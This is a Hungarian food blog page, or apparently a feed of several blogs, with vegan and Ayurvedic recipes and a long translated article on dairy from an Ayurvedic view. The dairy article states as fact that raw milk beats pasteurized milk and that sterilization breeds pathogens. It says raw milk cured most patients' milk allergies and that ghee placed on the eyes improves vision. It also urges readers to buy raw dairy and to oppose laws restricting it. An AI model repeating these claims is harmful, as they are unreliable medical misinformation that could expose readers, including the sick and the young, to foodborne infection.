Rájöttem, hogy itt a blogon egy nagyon régi tökfőzelék recept van fent, -ITT- és arra is rájöttem, hogy én már egészen másképp csinálom a nyers tökfőzeléket... De hogy egyről beszéljünk, amikor találkozunk, meg kell osztanom ezt a receptet is :) Hozzávalók 1 közepes főzőtök 1 marék kesudió (kb 6-8 dkg) só, kapor, citromlé, 1-2 szem datolya esetleg még: 1 szál újhagyma, 1 kicsi zsenge sárgarépa, 1 szál zellerszár (szárzeller) A tököt meghámozzuk, hosszában négyfelé vágjuk, a középső magos részét kivágjuk, nem dobjuk ki, félretesszük. A tök húsát legyaluljuk, vagy nagylyukú reszelőn lereszeljük. A félretett tök-belsőt turmixgépbe tesszük és simára turmixoljuk. Fűszerezzük sóval, kaporral, citromlével, az édes íz miatt egy két szem datolyát is szoktam beletenni. Hozzáadjuk a kesudiót is, és egy krémes, egyszerre sós, savanykás, kapros ízű szószt kapunk. Ha az íze elég intenzív, akkor össze lehet keverni a reszelt tökkel. Azonnal lehet tálalni :) Ha nincs otthon kesudió, akkor áztass be napraforgómagot legalább 6 órára tiszta vízbe. Cseréld a vizet, ahányszor csak tudod. A magok csodálatos átalakuláson mennek keresztül, készülnek csírázni... Használd a kesu helyett... majdnem olyan finom lesz vele. Ha van kéznél néhány felhasználható friss zöldség, akkor a turmixba mehet egy pici sárgarépa vagy újhagyma vagy zeller, ezekkel kicsit teljesebb lesz az ízhatás, természetes ételízesítők :) Tálaláskor mehet még hozzá felvágott kapor :) Fasírttal a legjobb...
Khir (indiai édesrizs)
2017. július 25. Élj harmóniában
Rizs Khir (indiai édesrizs) Ha már a minap kitettem a tejfogyasztás ősi, ájurvédikus megközelítését (itt olvashatod), gondoltam stílusosan egy tradicionális tejes édesség receptet is kiteszek a blogra. Az indiai konyhában általában a desszerteket a főétkezés részeként szolgálják fel, nem pedig külön a legvégén. Ájurvédikus szempontból az étkezés végén fogyasztott édesség székrekedést okozhat. Az édességeket leginkább vallási és családi ünnepségekre készítik. Az indiai khir egy folyós édesség, amit általában kardamommal vagy sáfránnyal készítenek el. Fenti fűszerek ellensúlyozzák a tejes édesség nyálkásító hatásait és ízletessé teszik az édességet. A khirhez gyakran tesznek manduladarabokat vagy pisztáciát Kapha típusúak csak ritkán fogyasszanak khir-t. Nagyon sokféle khir van (mandula, répa, datolya, etc.) . A legelterjedtebb a rizsből készített khír, magyarul édesrizs. Hozzávalók 1/4 csésze rövid szemű rizs 1 l friss teljes tej (nem homogenizált, nem ultra pasztörizált) 2 db egész kardamom 3/8 csésze teljes értékű barna nádcukor Vegyszermentes (bio) alapanyagokat használj! A rizst szűrőben alaposan mosd meg és csöpögtesd le. A kardamom hüvelyeket kicsit nyomkodd szét, hogy picit megnyíljon. A tejet és a kardamomot tedd egy vastag aljú edénybe és állandóan kevergetve forrald fel közepes lángon. Majd vedd takarékra a lángot és tedd hozzá a rizst. Forrald óvatosan kevergetve kb. 40 percig, amíg besűrűsödik. Amikor az édesrizs kicsit krémes és enyhén sűrű, de még folyós lesz akkor vedd le a tűzről. Vedd ki a kardamomokat és keverd hozzá a cukrot, majd hagyd kihűlni. A tetejét megszórhatod mandulaforgáccsal vagy pisztáciatörettel .
A tejfogyasztásról, ájurvédikus szemszögből dr. David Frawley tollából
2017. július 23. Élj harmóniában
A tejfogyasztás manapság nagyon felkapott, vitatott téma. Fogyasszuk, ne fogyasszuk, életerő, egészség vagy halálos méreg.... Amikor tudatos táplálkozás tanfolyamot vagy ájurvéda tanfolyamot tartok, akkor mindig el szoktam mondani a védikus megközelítést, ami alapján a tej életerő,egészség és a spirituális megvalósításhoz fontos táplálék. A probléma nem a tejjel van, hanem a megfelelő tudás hiányával. Azzal, hogy a nyugati társadalom nem tudja mi nevezhető tejnek vagy éppen a tejet ki, milyen módon, mikor, mivel kombinálva fogyassza ahhoz, hogy valóban életerő legyen és ne méreg a szervezete számára. Nagyon régen készültem írni egy cikket a tej ájurvédikus megközelítésről. Amikor ráakadtam dr. David Frawley nemzetközileg elismert ájurvédikus orvos cikkére a yogainternational.com oldalon tudtam, hogy a saját írásom helyett, az ő cikkének fordításával próbálok mindenkit hozzásegíteni ahhoz, hogy a tejfogyasztásról több tudással rendelkezzen. David Frawley: Ájurvédikus tejtermék: A tej és joghurt nyers története Természetes ételek mozgalmában állandó vita folyik a tejtermékek értékéről. Időnként a tejtermékek a hússal említik egy lapon, mint ami egészségtelen étel az emberek számára és néhány vegetáriánus vagy tisztán vegán illető még azt is kijelenti, hogy a tejtermékek betegségeket okoznak. Bár van némi igazság az ilyen és ezekhez hasonló kijelentésekben, teljességében nem magukkal a tejtermékekkel van baj. Sokkal inkább hibáztathatjuk a tejtermelő állatok nem megfelelő tartását, a tej nem megfelelő feldolgozását és a az arról szóló megértés hiányát, hogy hogyan használjuk a tejtermékeket. Természetes ételek mozgalmában állandó vita folyik a tejtermékek értékéről. India hindu és buddhista tradíciói a tejtermékeket kiváló ételnek tekintik, különösen azok számára, akik valamilyen spirituális úton járnak. Míg a tejtermékeket nem ajánlják minden test típus számára, mégis mindannyiunk számára fontos szerepe van nemcsak az egészség fenntartásában, hanem az élet meghosszabbításában is. Az ősi védikus civilizáció a tehén körül fejlődött ki, ami tejet, tejszínt, vajat és joghurtot biztosított. A történelem során ezek az ételek a jógik kedvencei voltak, akik nem találták az egészségre ártalmasnak ezeket. India legnagyobb ,,tanítóinak egyike, Krisna hírhedt volt arról, hogy azonnal megdézsmálta a frissen kiköpült vajat, ha azt egy gyanútlan háziasszony felügyelet nélkül hagyta. Érdekes, hogy a Védák a tejtermékek esetében szélesebb választékot adnak, mint bármi más ételek esetében - beleértve a gabonaféléket, zöldségeket és gyümölcsöket is. Az ájurvéda sok tejterméket használ gyógyszerként, pontosabban betegségekkel szembeni ellenállás növelésére és arra hogy támogassa a felépülést és a regenerálódást. Ebbe beletartoznak a tejből készült főzetek, vajak és ghík és más speciális készítmények. A tejtermékeket nem csak fiatalok számára, de idősebbeknek is ajánlják, illetve azoknak is, akik bármilyen módon gyengélkednek vagy felerősítésre szorulnak. A szent tehén A tehén ősidők óta a legszentebb állat Indiában. Részben azért, mert természetes módon több tejet ad, mint amennyire a borjának szüksége van és boldog tőle, hogy megoszthatja a többletet az emberrel. A tehén amiatt, hogy kedves természettel rendelkezik és önzetlen módon táplál, az Isteni Anya szimbóluma. A legnagyobb védikus mantrát, a Gayatrit egy tehén formájában vizualizálják. Az ősi védikus írások magát az univerzumot is mint Kozmikus Tehenet írják le. A Föld is olyan, mint a tehén azáltal, hogy önzetlenül táplálja és fenntartja az élőlényeket, akik rajta függenek. A görög 'gaia' és a szanszkrit 'gau' jelentései szintén 'Föld' és 'tehén'. A Gaia Elv, ami azt állítja, hogy van egy szerves intelligencia, ami áthatja és szabályozza az életet a Földön, a Kozmikus Tehén ősi hasonlatának modern változata. Megítélhetjük, hogy az emberek hogyan bánnak a Földdel azáltal, hogy hogyan bánnak a teheneikkel. Manapság ezeknek az érzékeny állatoknak a kizsákmányolása tükrözi azt a gátlástalan, fogyasztó orientált kultúrát, ami szennyezi és elpusztítja földgolyónkat. Megmondhatjuk, hogy az emberek hogyan bánnak a Földdel, az alapján, hogyan bánnak a tehenekkel. Ramana Maharisi, aki a modern India talán legszélesebb körben tisztelt bölcse azt mondta, hogy saját tehene spirituális felszabadulást (moksa) ért el halálakor. Ashramjában a tehénnek, valamint a majomnak és a hollónak a szentélyei találhatóak, akik ott a Maharisi állandó társai. Míg az ember könnyebben eléri a felszabadulást, mint az állatok (bár ez mindkettő számára nehéz) az állatoknak is van lelkük, ami reagál a spirituális befolyásokra. Ha felismerjük és nagyra értékeljük az állatok spirituális kapacitását, akkor nem fogjuk őket bántani. A kizsákmányolásuk abból adódik, hogy azt képzeljük, hogy nekik nincsenek igazán érzéseik, hogy őket Isten csak a mi kényelmünkre teremtette. Az ősi India írásaiban az állatok tanítókként jelennek meg. A Csandogja Upanisadban például Szatjakamát a bika, a tűz, a hattyú és a daru tanította a Brahman (a kozmikus valóság) négy aspektusára. Amikor hazatért, a tanárai látták az arcán ragyogni az igazság fényét és felismerték, hogy pusztán a fenti tanároktól megtanulta a teljes igazságot. A Védák kijelentik továbbá, hogy tehenet bölcseknek kell adni és nem királyoknak vagy kereskedőknek. Ez azt jelenti, hogy a bensőséges tudás fényét azokkal kell megosztani, akik spirituális szempontból motiváltak és nem azokkal, akik politikai vagy üzleti beállítottságúak. A védikus időkben a brahmana gyerekek (szerk.brahmana társadalmi réteg tagjai: papok, tanítok, bölcsek, spirituális személyek, aszkéták, jógik) fontos kötelessége volt megtanulni azt, hogy hogyan kell teheneket felnevelni és megfejni. Ez még a mai napig is így van néhány helyen Indiában. A tehén évezredek óta az erőszakmentesség szimbóluma és annak érdekében, hogy megtanuljanak megfelelően gondoskodni róluk, a gyerekeket megtanították a kedvességre, önzetlenségre, elfogadásra és bölcsességre valamint arra is, hogy ezeket a tulajdonságokat építsék be a meditációjukba is. A tejtermelés modern módszerei A tejtermékekhez számos egészséggel kapcsolatos téma kapcsolódik, amiket meg kell értenünk ahhoz, hogy helyesen tudjuk használni ezeket az élelmiszereket. Az emberek egy része híján van olyan enzimeknek, amik szükségesek a tejtermékek emésztéséhez csupán csak amiatt, mert az adott etnikai csoportjuknak a történelmi múltjában nincsen benne a tejtermékek fogyasztása. Azoknak a felnőtteknek, akik csecsemőként nem kaptak anyatejet szintén problémát jelenhet a tejtermékek megemésztése. Sőt a legtöbb probléma, amit a tejtermékek emésztésében tapasztalunk, nem maguk a tejtermékek miatt van, hanem ezek helytelen előállításában. Ahogy nem okolhatjuk a krumplit azokért a nehézségekért, amiket a rósejbni evése okoz - ugyanígy nem okolhatjuk a tejtermékeket azokért a bizonyos problémákért, amikkel ma az emberek szembesülnek. Ahogyan a teljes kiőrlésű liszt különbözik a fehér liszttől, ugyanígy a természetes módon készült tejtermékek kifejezetten mások, mint a szupermarketekben általában kapható túlzott módon feldolgozott társaik. Indiában megengedik, hogy a tehén először a borjának adjon a tejéből. Az ember számára csak azt a tejet használják, ami ezen túl marad, ami gyakran még így is jelentős mennyiség. Ha a borját elválasztják tőle, a tehén teje sokat veszít annak tápláló minőségéből. A tejipar elválasztja a borjat az anyjától és lemészárolja. Megöljük a tehén gyerekét és aztán megisszuk a tejét. Hogyan érezné magát egy emberi anya egy ilyen körülményben? Amikor egy tehén meghallja a borjának a hívását, azonnal elkezd tejet kiválasztani. Amikor a borját elveszik tőle, akkor az aggodalom miatt toxinok fognak a tejébe kiválasztódni. Indiában megengedik, hogy a tehén először a borjának adjon a tejéből. Az ember számára csak azt a tejet használják, ami ezen túl marad, ami gyakran még így is jelentős mennyiség. A tehenekkel sok más módon is rosszul bánnak, mint például a szűkös élőhely és gépi fejés. Mostanra a mesterséges megtermékenyítésen keresztül hibrid állatokká váltak, akiket génekkel újraterveztek annak érdekében, hogy sokkal több tejet adjanak annál, mint amennyi egészséges számukra. Hormonokkal, antibiotikumokkal és nem-organikus gabonával etetik őket. A vegyszerek maradványai felszívódnak a szöveteikbe és aztán a tejükben koncentrálódnak. A hagyományos indiai gyógyászat figyelmeztet arra, hogy el kell kerülni a szennyező hatású vegyszereket és gyógyszereket, mert ezek felhalmozódnak a szöveteinkben és betegséget okoznak. Az ájurvéda nagyon részletesen ír a különféle tejtermékek jellemzőiről, többek között a tehén, bivaly, kecske és más tejet adó állatok esetében is.Bár ezek nem feltétlenül egyeznek azokkal a jellemzőkkel, amiket a modern nagyüzemi termelés produkál. Az ájurvéda írásai elmondják, hogy a kipányvázott vagy szűkös helyen élő állatok esetében a húsnak vagy a tejnek a minősége sokkal szegényesebb, mint a szabadon legelésző állatok esetében. Ez rengeteg kérdést is felvet. Milyen mértékben károsítják a tejtermékeket a modern termelési módszerek? Mi az a határ, amin túl ezek a módszerek már nem hasznosak? Milyen mértékben támaszkodjunk ezekre a hátrányos feltételekre anélkül, hogy teljes mértékben feladnánk a tejtermékeket? És mit tehetünk azért, hogy a jelenleg elérhető tejtermékek minősége jobb legyen? A pasztőrizálás csapdái A jóga szerint a tej természetét tekintve tiszta vagy szattvikus minőségű. (szerk. az ételek minőségéről itt olvashatsz bővebben) Szeretetből születik és növeli a természetes intelligenciánkat és érzékenységünket. Mindazonáltal áldásos tulajdonságait nem csak az csökkentheti, hogy hogyan tartják a tejelő állatot, hanem az is, hogy hogyan dolgozzuk fel a tejet. Pasteur volt a szülőatyja annak, hogy a betegségeket baktériumokhoz kötötték. Mivel ennél a teóriánál a betegséget a baktérium okozta, ezért a betegségek megelőzésének legjobb módja az ételek és a környezet sterilizálása. A természet tele van baktériumokkal, ezért nem biztonságos és minden természetes termék gyanakvást kelt. A holisztikus gyógyítás szempontjából viszont a sterilizálás valaminek a megölését jelenti. A steril környezet a legjobb hely a kórokozók kifejlődéséhez, mert a sterilizálás során az életerő és a természetes immunitás tűnik el. A tej pasztőrizálása annak melegítését is magában foglalja, ami megöl minden baktériumot ami benne van. Ez lehetővé teszi, hogy a tej hosszabb ideig elálljon, anélkül hogy tönkremenne és ez kereskedelmi szempontból értékesebbé teszi azt, de ez nem jelenti azt, hogy jobb minőségű ételt kaptunk. Ebben a folyamatben lényegében előfőzik a tejet, ami csökkenti annak vitalitását. Bár a pasztőrizált tej jobb a számunkra, mint a hús vagy a junk food, de a nyers tejtermék még annak pasztőrizált társánál is jobb. A pasztőrizálás csak az egyik eljárás a sorban, ami rontja a tejtermékeink minőségét. Részét képezi annak a mentalitásnak, ami azt mondja, hogy az ember mindig jobbá teheti a természetes dolgokat és biztonságosabbá is ha előbb különféle eljárásokkal kezeli őket. A mi kultúránk azt mondja, hogy a tej természetes állapotában az emberi fogyasztás szempontjából nem biztonságos, míg azt a tejet tökéletesnek látjuk, amit a mesterséges körülmények között tenyésztett állatoktól vesznek el, akik mesterséges ételeket, gyógyszereket es hormonokat kapnak. A tejtermékeinket pasztőrizáljuk, homogenizáljuk, hosszú időre lehűtjük es adalékokat adunk hozzájuk - sót, cukrot, mesterséges ízeket és színeket. A tejhez hozzáadott A és D vitaminok általában hal máj olajból származnak, így gyakran a tej még csak nem is vegetáriánus. A tejtermékek természetes szattvikus vagy tiszta tulajdonságait teszik tönkre ezek eljárások által. Azért, hogy a tejtermékek mélyebb gyógyító tulajdonságait valóban ki tudjuk használni, a nyers tejet kell előnyben részesítenünk. Ez különösen fontos olyan gyógyító eljárások esetében, ahol a megújulás vagy az elmeállapot javítása a cél, arra figyelni kell, hogy a nyers tejtermékek mindig frissek legyenek, máskülönben károsak lehetnek. Azért, hogy a tejtermékek mélyebb gyógyító tulajdonságait valóban ki tudjuk használni, a nyers tejet kell előnyben részesítenünk. Sok olyan pácienst kezeltem, akiknek tejallergiájuk volt. Amint átálltak a nyers tejre - megfelelő fűszerekkel elkészítve -, legtöbbjük (hacsak nem mindegyikük) esetében az allergén reakciók eltűntek. Miután az ember megtapasztalta az ájurvédikus indiai vagy hazai családi farmokról származó tejtermékek hatásait, könnyű látnia, hogy amit a szupermarketekben eladnak, az meglehetősen silány minőségű, a különbség nagyjából olyan, mint ami a kertben frissen termesztett és a mesterséges körülmények során létrehozott és hónapokig tárolt zöldség között van. Elkészítés Az is nagyon fontos, hogy hogyan fogyasztjuk a tejtermékeket. Az ájurveda azt mondja, hogy a meleg tej gyógyít, míg a hideg tej megbetegít, ezért a tejet melegen kell fogyasztani. Továbbá megfelelő fűszerek használatával ellensúlyozni kell a tej és a tejtermékek nyálka képző tulajdonságait. Van néhány korlátozás a tejtermékekkel való főzés esetén is, azon ételek jellemzői alapján, amikkel együtt akarjuk használni azokat. Tejet, joghurtot, sajtot vagy tejfölt nagyon jól lehet használni levesek és curryk esetében. Az ájurvéda azt is megjegyzi, hogy a tejtermékek - csakúgy mint a cukor - káros lehet, ha túlzott mértékben fogyasztjuk, különösen hidegen. Nedves és nehéz természete miatt eltömítheti a keringési rendszert. Ez sokféle krónikus betegséget okozhat, mint amilyen például az allergia, asztma, artritis vagy a szívbetegségek. Ezért az általunk fogyasztott tejtermékek mennyiségét is megfelelő módon kell szabályozni. Hogyan használjuk a tejtermékeket? Tehéntej A tej egy ideális fiatalító étel; táplálja az elmét és a szívet. Jó hatással van a száraz köhögésre, tüdővérzésre, fekélyekre és kelésekre, terméketlenségre és általános gyengeségre. A meleg tej természetes hashajtó hatású, ha ghível fogyasztjuk. A pasztörizált és homogénezett tej azonban gyakran okoz székrekedést. A kardamom a legjobb fűszer, ami ellensúlyozni tudja a tej nyálka képző hatását. Erre a célra használják a gyömbért, fahéjt és a kurkumát is. A fűszeres gyógynövények nemcsak emészthetőbbé teszik a tejet, de gyógyhatással is kiegészítik a hatásait. A meleg tej egy csipet szerecsendióval egy jó otthoni megoldás az álmatlanságra. A tej főzetekben használt felerősítő hatású gyógynövények (mint például az ashwagandha (Withania somnifera), shatavari (Asparagus racemosus), fekete nadálytő gyökér és a ginseng) hatékony fiatalító ételekké változtatják azt. A tehéntejet nem ajánlják a kapha (nehéz vagy nedves) testtípusúaknak, bár ők néha gond nélkül képesek emészteni az alacsony zsírtartalmú tejet. A legjobb a váta (levegős) és pitta(tüzes) testtípusúaknak, akiknek szükséges a tej nedvesítő energiája. Az ájurvédikus gondolkodásban a jó tej olyan, mint a tiszta plazma, ami minden szövetet táplál. Az alacsony minőségű tej azonban olyan, mint a tiszta nyálka, ami a plazma salakanyaga. A tehéntejet nem ajánlják a kapha (nehéz vagy nedves) testtípusúaknak, bár ők néha gond nélkül képesek emészteni az alacsony zsírtartalmú tejet. Kecsketej A kecsketej jó a kapháknak, olyanoknak akik nyálkásodnak és ödémásak, de kizárólag melegen és fűszerekkel. A kecsketej meleg természetű ezért lázas állapotban kerülni kell - csakúgy mint fertőző betegségek és gyomorsavtúltengés esetén is (pitta testtípus). Tejszín Tejszín hasonlít a tejhez, de annál nehezebb. Óvatosnak kell lennünk vele vérbőség és gyenge emésztés esetén. A tejtermékekkel kapcsolatban (főleg a nehezebbekkel, mint a tejszín, a sajt és a túró) egy jó általános szabály az, hogy el kell kerülni őket, ha nagy mennyiségű lepedék jelenik meg a nyelven, ami a emésztő szervrendszerben lévő vérbőségre utal. Jégkrém A jégkrémet a test nehezen tudja kezelni. Hideg természete elnyomja az emésztés tüzét, különösen, ha étkezés után fogyasztjuk. Sok cukrot tartalmaz és gyakran sok más adalékot is (mint például a tojás). Az ájurvéda általában nem ajánlja. Mindazonáltal a jégkrém vagy jeges joghurt természetes formájában nyáron fogyasztható, abban az esetben, ha jó az emésztésünk, nem vagyunk túlsúlyosak és ha figyelünk arra, hogy milyen más ételekkel kombináljuk. Joghurt A joghurt nehéz, mint például a sajt és ellentétben a népszerű félreértéssel, nem segít a fogyásban (hacsak nem a húst vagy más nehezebb ételt helyettesítjük vele). Ezzel ellentétben, nagyon jó a hízáshoz. Bár a zsírszegény joghurt kevésbé nehéz, mégsem megfelelő a fogyókúrához. Bár nyugaton reggeli ételként használják, a joghurt nem mindig jó reggel, mert ilyenkor több nyálka és vér van a szervezetben felkelés után. A reggeli hideg joghurt nyálkát termel a szervezetben. Gyümölccsel együtt fogyasztva növeli annak vizes- és nyálkaképző természetét. Általában a joghurtot nem szabad önmagában vagy üres gyomorra enni. Jól kombinálható viszont az uborkával, aminek könnyedsége kiegyensúlyozza a joghurt nehéz természetét. A joghurt a raita alapja, ami egy olyan saláta amit a legtöbb indiai étkezés során felszolgálnak. (szerk. raita receptet itt olvashatsz) A joghurt az olyan fűszerekkel együtt a legjobb, mint a kömény, koriander vagy cayenne. A joghurt gyakran a legbiztonságosabb a tejtermék. Még a nem éppen legjobb minőségű tejből is lehet kielégítő minőségű joghurtot kapni. Könnyen el is tudjuk készíteni saját magunk számára. Azonban a joghurt minél savanyúbb, annál jobban savasít és annál jobban mérgezi a vért. Az édes joghurt ezért jobb. A joghurt akkor is savasítóbb, ha savas gyümölcsökkel vagy banánnal fogyasztjuk. A joghurt főleg a váta testtípusnak jó, a kaphák ás pitták óvatosan kell hogy bánjanak vele, bár a pitta viszonylag könnyen tudja kezelni az édes joghurtot. Indiai író A joghurtot úgy jó fogyasztani, ha például ugyanannyi mennyiségű vízzel összeturmixoljuk és némi kardamomot vagy szerecsendiót adunk hozzá. Ezt hívják takrának, vagy indiai írónak. Bár hűtő természetű, mégis jó lábadozás és gyenge emésztés esetén, különösen hasznos felszívódási zavar és hasmenés esetén. Az indiai írót az istenek eledeleként is emlegetik. Azonban a joghurt minél savanyúbb, annál jobban savasít és annál jobban mérgezi a vért. Az édes joghurt ezért jobb. Nyugati író A nyugati író pasztőrizált és gyakran nagy mennyiségű sót tartalmaz. Máskülönben ez egy jó tejtermék. Sokkal inkább vizelethajtó, mint más tejtermékek és kevésbé képez nyálkát a szervezetben. Ebből a szempontból jobb a kapháknak. Hasznos felszívódási zavar, gyenge emésztés és hasmenés esetén is. Kefir A kefir egy másik erjesztett tejes ital, különösen hasznos a vátáknak, akiknek levegős vagy ideges természetük van. Ugyanazokat a problémákat okozhatja, mint a tej és a joghurt, ha gyümölccsel kombinálják. Az édesített kefír ráadásul nagy mennyiségű cukrot is tartalmazhat. Sajt A sajt nehéz, ragadós és gyakran nehéz megemészteni. Nem ajánlják, vérbőség, pangás esetén vagy akkor, amikor a keringési rendszer el van tömődve. Okozhat köszvényt, ízületi gyulladást, fertőzéseket, aknét, meghűlést, influenzát és tüdő rendellenességeket és növelheti a koleszterin szintet is. Minnél erjedtebb és sósabb annál nehezebb megemészteni. Az oltót, amit általában használnak, gyakran tehenek beléből származik, ezért a kereskedelmi forgalomban lévő sajtok legtöbbje szigorú értelemben véve nem vegetáriánus. Ilyen esetben bizonyosodj meg róla, hogy oltó nélküli sajtot vásárolsz-e. A legjobb olyan oltó nélküli sajtot fogyasztani, ami csak kevés sót tartalmaz és nincs erjesztve. A könnyű, édesebb sajtok ajánlottak. A sajt nehéz tulajdonságát részlegesen ellensúlyozni lehet olyan fűszerekkel, mint pl. a mustár, cayenne, fekete bors, torma és kömény. A sajtot rá lehet olvasztani zöldségekre, különösen olyanokra, amik könnyű természetűek, mint pl. a brokkoli és a karfiol. Ilyen módon a zöldségek és a sajt tulajdonságai is ki lesznek egyensúlyozva. A farmer sajt (panír) könnyebb és ezért könnyebben is emészthető. Ez a legelterjedtebb Indiában. A cottage cheese szintén könnyű és könnyű emészteni is, hűsítő és magas fehérjetartalma miatt tápláló is. A krémsajt kicsit ragadósabb, de a közönséges sajtnál még mindig jobban emészthető. A cottage cheese szintén könnyű és könnyű emészteni is, hűsítő és magas fehérjetartalma miatt tápláló is. Tejföl A tejföl talán a leginkább savas tejtermék és olyan pitta tüneteket erősít, mint pl. a kelés, gyomorégés, láz és fertőzések. A legjobb a váta (levegős) típusúaknak. Vaj A vajat általában pasztőrizált tejből csinálják. Gyakran adnak hozzá színezéket és nagy mennyiségű sót is. Előfordulhat, hogy hosszabb időre lefagyasztják, ami csökkenti az egészségmegőrző tulajdonságait. A vaj jó azoknak, akiknek erős az emésztésük és a belső tűzük (pitta típusúak). Nem szabad hidegen enni - jobb, ha ráolvasztjuk az ételre. A túl sok vaj (csakúgy mint a sajt) beleragadhat a bélcsatornába és megemelheti a koleszterin szintet. Külsőleg alkalmazva a vaj jó az égésre és a kiütésekre is. Ghí A ghí (tisztított vaj) amit nyers vajból készítenek többnyire mindenkinek megfelelő. (ghí receptet itt találsz) Növeli az erőt, vitalitást és intelligenciát, jó láz és fertőzés ellen is. A máj könnyen feldolgozza, bár növeli a koleszterin szintet (de nem annyira, mint a vaj). Erősíti az immunrendszert, növeli az élethosszt és a tudatosságot. Tökéletes étel meditációhoz és szellemi munkához. A ghít ételekkel vagy tejes italokhoz kell fogyasztani. Mint az olajok is általában, önmagában fogyasztva orrvérzést okozhat. A ghí olyan ájurvédikus gyógyhatású olajok alapja, mint pl. a brahmi (gotu kola) és a calamus ghee. Szemre helyezve növeli a látást (erre különösen a triphala ghí jó). Vérképzéshez és kifejezetten a nőknek a legjobb a kurkuma ghí illetve a ghíben főzött kurkuma. A ghít a legjobb nyers, sózatlan vajból készíteni. Általában hónapokig eláll és még tovább is ha hűtőben tartjuk. Vörösréz edényben tárolva mindenféle bőrproblémákra és a bőr gyulladásos elváltozásaira is jó ha külsőleg alkalmazzák. A ghí a rituálék és a meditáció alatt hasznos lámpaolajként is, mivel úgy tartják, hogy a benne lévő tápláló erőnek tisztító hatása van a környezetre és az elmére is. Tejtermékek vásárlása A tejtermékeknek a modern társadalomban elfoglalt sajnálatos helyzete valamint a tejelő állatokkal való hibás bánásmód miatt az emberek érthető módon hajlamosak teljes mértékben elutasítani a tejtermékek fogyasztását. Másrészről sokan mások, akik váta és pitta felépítésűek vagy éppen gyengélkednek, nagyon hasznosnak fogják találni a tejet. Minden bizonnyal próbát kell tennünk vele, ha súlygyarapodást vagy vitalizálást akarunk elérni, mielőtt olyan élelmiszerekhez fordulunk mint a hús, hal, cukor vagy mesterséges összetevőkből álló ételek. Támogasd a helyi tehenészt - és a helyi tehént is. Bár legtöbbünknek nem kell teljes mértékben elutasítanunk a tejterméket, viszont szorgalmaznunk kell azok megfelelő minőségben történő előállítását. Próbálj olyan forrásból tejtermékeket beszerezni, ahol jól bánnak az állatokkal és organikus módon táplálják őket. Vegyél feldolgozatlan (nyers) tejtermékeket, ha lehetséges. Ha ez törvényileg nem lehetséges ott ahol élsz, akkor bátorítsd a változásokat az ilyen és ehhez hasonló ésszerűtlen törvények esetében. Támogasd a helyi tehenészt - és a helyi tehént is. Tejtermékek és más ételek A tejtermékek nem kombinálhatóak néhány fajta élelmiszerrel - és előfordulhat, hogy egymással sem keverhetőek. (szerk. az ételkombinációkról részletes itt olvashatsz) Rossz kombinációk o Bármilyen tejtermék hússal és hallal o Bármilyen tejtermék élesztős kenyérrel o Bármilyen tejtermék savanyú gyümölccsel o Bármilyen tejtermék magokkal o Tej joghurttal o Tej sóval Megfelelő kombinációk o Tejtermék édes gyümölccsel o Tejtermék keményítőt tartalmazó zöldségekkel o Tejtermék teljes értékű gabonával az eredeti cikk itt olvasható https://yogainternational.com/article/view/ayurvedic-dairy-the-raw-story-on-milk-yogurt-and-more
fahéjas kalács
2017. július 18. Beautilicious
Nagyon régóta gondolkozom egy omlós, puha kalács elkészítésén. Ez most végre bekövetkezett, és az eredmény pont olyan lett, mint amilyent reméltem, sőőőt... :). Bekerült a kedvenceim közé. Hozzávalók - 2répa - 1alma - 4 tojás - 100ml növényi tej - 150gr zabliszt - 50gr kókuszliszt - 20gr tápióka keményítő - 50gr édesítő - fahéj - 1 zacskó sütőpor Így készítsd - A répát és az almát hámozd meg, majd kockázd fel - Tedd turmixgépbe és add hozzá a tojássárgáját és a tejet - keverd össze a liszteket, a keményítőt, a sütőport és az édesítőt - Öntsd hozzá a répás keveréket - Verd kemény habbá a tojásfehérjét, majd forgasd a tésztához - A feléhez adj fahéjat, majd kenyérsütő formába adagold a tésztát rétegezve - Süsd 180 fokon 45percig
Török padlizsánragu gránátalmás fűszeres bulgursalátával (laktózmentes, vegán)
2017. július 16. Zizi kalandjai
A Nar Gourmet blog szerzője, Tóth Ági, júniusra hirdetett vegetáriánus-vegán török hónapot, amely keretén belül jobbnál jobb gasztronómiai programokat szervezett az érdeklődőknek. A török húsmentes hónap során Ági bemutatta a török konyha sokszínűségét, mind a blogbejegyzései, mind a tematikus események segítségével. A török konyháról első hallásra mindenkinek a húsos, fűszeres, sokszor nehéz ételek jutnak eszébe, keveset tudunk arról, hogy Törökország gasztronómiája milyen gazdag és kreatív a zöldségek felhasználása terén. Ha vegetáriánusként, vegánként eljutunk az országba, biztosan lesz mit ennünk… erről meggyőződhettem az egyik Ági által szervezett programon, a török vegán főzőkurzuson.
Alapanyagok előkészítése a lencseleveshez…
Alapanyagok a padlizsánraguhoz és a bulgur salátához…
Ági nagyon izgalmas menüsort állított össze a kurzusra: Mercimek çorbas? (Vöröslencse leves) // Narl? k?s?r (Gránátalmás, fűszeres bulgursaláta) // Patl?can yahn?s? (Padlizsán ragu paradicsommal es burgonyával) // Zerde (Sáfrányos-fenyőmagos puding). Mindegyik egyszerűen elkészíthető étel volt egy kis csavarral, így nem meglepő, hogy a végén a közösen elfogyasztott vacsora során fantasztikus ízek bombázták az ízlelőbimbóinkat!
Vöröslencse leves fűszeres olajjal meglocsolva és pár csepp frissen facsart citromlével tálalva – mennyei ízek egy kis tálkában!
Sáfrányos-fenyőmagos puding – szokásosan nagyon-nagyon-nagyon édes török desszert… kicsinek tűnhet a tálka, de én ebből 8-10 teáskanálnyit tudtam megenni és azzal fedeztem egy heti cukoradagomat!!!
És akkor néhány szó a főételekről… “A török konyha egyik legfontosabb alapanyaga a bulgur, amelyet ezernyi fajta ízesítéssel tálalnak akár előételként, akár salátaként, köretként vagy főételként. Törökországban szerintem nem létezik olyan ember, aki ne ismerné a k?s?r nevű salátát, mely egy elképesztően friss ízbomba! Ez az étel egy esszencia! Összesűrít megannyi ízt, melyek nekem a török gasztronómiát jelentik és elkészítése is szimbolizálja a török háziasszonyok főzéshez való hozzáállását, vagyis, hogy milyen fontos, hogy szívünket, lelkünket és leginkább kezünk erejét és melegét átadjuk egy ételnek.” – mesélte Ági erről a különlegesnek tűnő, de mégis egyszerű salátáról.
Az egyedüli, ami furcsának tűnhet az az olívaolaj mennyisége (200 ml 4 főre), de a gyúrás során a bulgur eléggé magába szívja az olajat is és ennek segítségével, meg a fűszerekkel “főzzük” meg a bulgurt, tehát nem lesz nagyon olajos a saláta.
Nagy keverőtálba téve a bulgursaláta hozzávalói…
Saláta kézzel “gyúrása”…
Saláta ízesítése friss citromlével…
